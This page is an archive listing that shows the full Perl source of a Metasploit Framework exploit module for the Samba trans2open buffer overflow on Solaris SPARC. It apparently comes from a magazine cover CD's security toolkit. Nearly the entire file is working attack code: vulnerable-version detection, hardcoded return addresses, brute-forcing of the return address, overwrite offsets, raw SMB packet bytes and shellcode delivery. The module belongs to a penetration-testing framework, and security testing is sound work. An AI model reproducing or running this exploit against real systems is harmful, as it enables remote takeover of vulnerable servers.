home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / samba_trans2open_solsparc.pm

< prev

next >

Wrap

Text File  |  2006-06-30  |  7KB  |  258 lines

---

1.  
2. ##
3. # This file is part of the Metasploit Framework and may be redistributed
4. # according to the licenses defined in the Authors field below. In the
5. # case of an unknown or missing license, this file defaults to the same
6. # license as the core Framework (dual GPLv2 and Artistic). The latest
7. # version of the Framework can always be obtained from metasploit.com.
8. ##
9.  
10. package Msf::Exploit::samba_trans2open_solsparc;
11. use base "Msf::Exploit";
12. use strict;
13. use Pex::Text;
14. use Pex::SMB;
15. use IO::Socket;
16.  
17. my $advanced = { };
18.  
19. my $info =
20.   {
21.     'Name'    => 'Samba trans2open Overflow (Solaris SPARC)',
22.     'Version' => '$Revision: 1.7 $',
23.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
24.  
25.     'Arch'  => [ 'sparc' ],
26.     'OS'    => [ 'solaris' ],
27.     'Priv'  => 1,
28.  
29.     'UserOpts'  =>
30.       {
31.         'RHOST' => [1, 'ADDR', 'The target address'],
32.         'RPORT' => [1, 'PORT', 'The samba port', 139],
33.         'SRET', => [0, 'DATA', 'Use specified return address'],
34.         'DEBUG' => [0, 'BOOL', 'Enable debugging mode'],
35.       },
36.  
37.     'Payload' =>
38.       {
39.         'Space'     => 1024,
40.         'BadChars'  => "\x00",
41.         'MinNops'   => 512,
42.         'Keys'      => ['+findsock'],
43.       },
44.  
45.     'Description'  => Pex::Text::Freeform(qq{
46.         This exploits the buffer overflow found in Samba versions
47.         2.2.0 to 2.2.8. This particular module is capable of
48.         exploiting the flaw on Solaris SPARC systems that do not
49.         have the noexec stack option set. Big thanks to MC and
50.         valsmith for resolving a problem with the beta version
51.         of this module.
52. }),
53.  
54.     'Refs'  =>
55.       [
56.         ['OSVDB', '4469'],
57.         ['URL',   'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
58.         ['MIL',   '55'],
59.       ],
60.  
61.     'Targets' =>
62.       [
63.         ["Samba 2.2.x Solaris 9 (sun4u) ",   0xffbffaf0, 0xffbfa000, 128, 0xffbffffc],
64.         ["Samba 2.2.x Solaris 7/8 (sun4u) ", 0xffbefaf0, 0xffbea000, 128, 0xffbefffc],
65.       ],
66.  
67.     'Keys'  => ['samba'],
68.  
69.     'DisclosureDate' => 'Apr 7 2003',
70.   };
71.  
72. sub new {
73.     my $class = shift;
74.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
75.     return($self);
76. }
77.  
78. sub Check {
79.     my $self = shift;
80.     my $target_host = $self->GetVar('RHOST');
81.     my $target_port = $self->GetVar('RPORT');
82.  
83.     my $s = Msf::Socket::Tcp->new
84.       (
85.         'PeerAddr' => $target_host,
86.         'PeerPort' => $target_port,
87.         'LocalPort' => $self->GetVar('CPORT'),
88.       );
89.     if ($s->IsError) {
90.         $self->PrintLine("[*] Error creating socket: " . $s->GetError);
91.         return $self->CheckCode('Connect');
92.     }
93.  
94.     my $x = Pex::SMB->new({ 'Socket' => $s });
95.  
96.     $x->SMBNegotiate();
97.     if ($x->Error) {
98.         $self->PrintLine("[*] Error negotiating protocol");
99.         return $self->CheckCode('Generic');
100.     }
101.  
102.     $x->SMBSessionSetup();
103.     if ($x->Error) {
104.         $self->PrintLine("[*] Error setting up session");
105.         return $self->CheckCode('Generic');
106.     }
107.  
108.     my $version = $x->PeerNativeLM();
109.     $s->Close;
110.  
111.     if (! $version) {
112.         $self->PrintLine("[*] Could not determine the remote Samba version");
113.         return $self->CheckCode('Generic');
114.     }
115.  
116.     $self->PrintDebugLine(1, 'LanMan: '.$version);
117.     $self->PrintDebugLine(1, ' OpSys: '.$x->PeerNativeOS);
118.  
119.     if ($version =~ /samba\s+([01]|2\.0|2\.2\.[0-7]|2\.2\.8$)/i) {
120.         $self->PrintLine("[*] Target seems to running vulnerable version: $version");
121.         return $self->CheckCode('Appears');
122.     }
123.  
124.     $self->PrintLine("[*] Target does not seem to be vulnerable: $version");
125.     return $self->CheckCode('Safe');
126. }
127.  
128. sub Exploit {
129.     my $self = shift;
130.     my $target_host = $self->GetVar('RHOST');
131.     my $target_port = $self->GetVar('RPORT');
132.     my $target_idx  = $self->GetVar('TARGET');
133.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
134.     my $target      = $self->Targets->[$target_idx];
135.  
136.     $self->PrintLine("[*] Starting bruteforce mode for target ".$target->[0]);
137.  
138.     if ($self->GetVar('SRET')) {
139.         my $ret = eval($self->GetVar('SRET')) + 0;
140.         $target->[1] = $target->[2] = $ret;
141.     }
142.  
143.     my $curr_ret;
144.     for (
145.         $curr_ret  = $target->[1];
146.         $curr_ret >= $target->[2];
147.         $curr_ret -= $target->[3]
148.       )
149.     {
150.  
151.         my $s = Msf::Socket::Tcp->new
152.           (
153.             'PeerAddr'  => $target_host,
154.             'PeerPort'  => $target_port,
155.             'LocalPort' => $self->GetVar('CPORT'),
156.             'SSL'       => $self->GetVar('SSL'),
157.           );
158.         if ($s->IsError) {
159.             $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
160.             return;
161.         }
162.  
163.         my $x = Pex::SMB->new({ 'Socket' => $s });
164.  
165.         $x->SMBNegotiate();
166.         if ($x->Error) {
167.             $self->PrintLine("[*] Error negotiating protocol");
168.             return;
169.         }
170.  
171.         $x->SMBSessionSetup();
172.         if ($x->Error) {
173.             $self->PrintLine("[*] Error setting up session");
174.             return;
175.         }
176.  
177.         $x->SMBTConnect("\\\\127.0.0.1\\IPC\$");
178.         if ($x->Error) {
179.             $self->PrintLine("[*] Error connecting to IPC");
180.             return;
181.         }
182.  
183.         ##
184.         # The obstacle course:
185.         #     outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
186.         #     smb_dump(smb_fn_name(type), 0, outbuf, outsize);
187.         #     return(outsize);
188.         ##
189.  
190.         # This value *must* be 1988 to allow findrecv shellcode to work
191.         my $pattern = Pex::Text::EnglishText(1988);
192.  
193.         ##
194.         # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
195.         #
196.         # Patch the overwritten heap pointers
197.         # substr($pattern, 1159, 4, pack('N', $target->[4]));
198.         # substr($pattern, 1163, 4, pack('N', $target->[4]));
199.         #
200.         # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
201.         # substr($pattern, 1195, 4, pack('N', 0xffffffff));
202.         #
203.         # Fix the frame pointer (need to check for null in address)
204.         # substr($pattern, 1243, 4, pack('N', $target->[3]-64));
205.         #
206.         # Finally set the return address
207.         # substr($pattern, 1247, 4, pack('N', $curr_ret));
208.         ##
209.  
210.         ##
211.         # This method is more reliable against a wider range of targets
212.         ##
213.  
214.         # Local variable pointer patches for early versions of 2.2.x
215.         substr($pattern, 1103, 36, pack('N', $target->[4] - 1024) x 9);
216.  
217.         # Overwrite heap pointers with a ptr to NULL at the top of the stack
218.         substr($pattern, 1139, 40, pack('N', $target->[4]) x 10);
219.  
220.         # Patch the type index into the smb_messages[] array...
221.         # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
222.         substr($pattern, 1179, 20, pack('N', 0xffffffff) x 5);
223.  
224.         # This stream covers the framepointer and the return address
225.         substr($pattern, 1199, 400, pack('N', $curr_ret) x 100);
226.  
227.         # Stuff the shellcode into the request
228.         substr($pattern, 3, length($shellcode), $shellcode);
229.  
230.         my $Trans =
231.           "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
232.           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
233.           "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
234.           "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
235.           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
236.           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90";
237.  
238.         my $Overflow = $Trans . $pattern;
239.         $self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret, length($Overflow)));
240.  
241.         if ($self->GetVar('DEBUG'))
242.         {
243.             print STDERR "[*] Press enter to send overflow string...\n";
244.             <STDIN>;
245.         }
246.  
247.         $s->Send($Overflow);
248.  
249.         # handle client side of shellcode
250.         $self->Handler($s->Socket);
251.  
252.         $s->Close();
253.         undef($s);
254.     }
255. }
256.  
257. 1;
258.